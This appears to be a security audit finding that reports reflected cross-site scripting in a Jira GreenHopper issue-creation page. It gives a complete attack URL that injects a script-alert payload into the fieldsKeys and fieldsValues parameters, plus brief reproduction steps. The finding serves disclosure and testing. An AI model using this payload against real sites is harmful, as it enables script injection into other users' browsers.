Targets: https://test01.jira-dev.com/secure/GHCreateNewIssue.jspa?key=&issueType=7&fieldsKeys=priority,customfield_10006,summary,fixVersions,components,customfield_10005,assignee,customfield_10004,reporter,customfield_100039fd29<script>alert('XSS')</script>15d31825f8e9d6606&fieldsValues=1@%@ @%@XSS"><script>alert('XSS')</script>@%@-1@%@-1@%@1000@%@0@%@100@%@isecpartners@%@iSEC"><script>alert('XSS')</script>&forcedFieldsKeys=&forcedFieldsValues=&createNext=false&projectId=&decorator=none&selectedProjectId=10000&pageType=ChartBoard&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1
Reproduction:
After login open target URL in browser.
Apply attack value "><script>alert('XSS')</script> in the fieldsKeys parameter.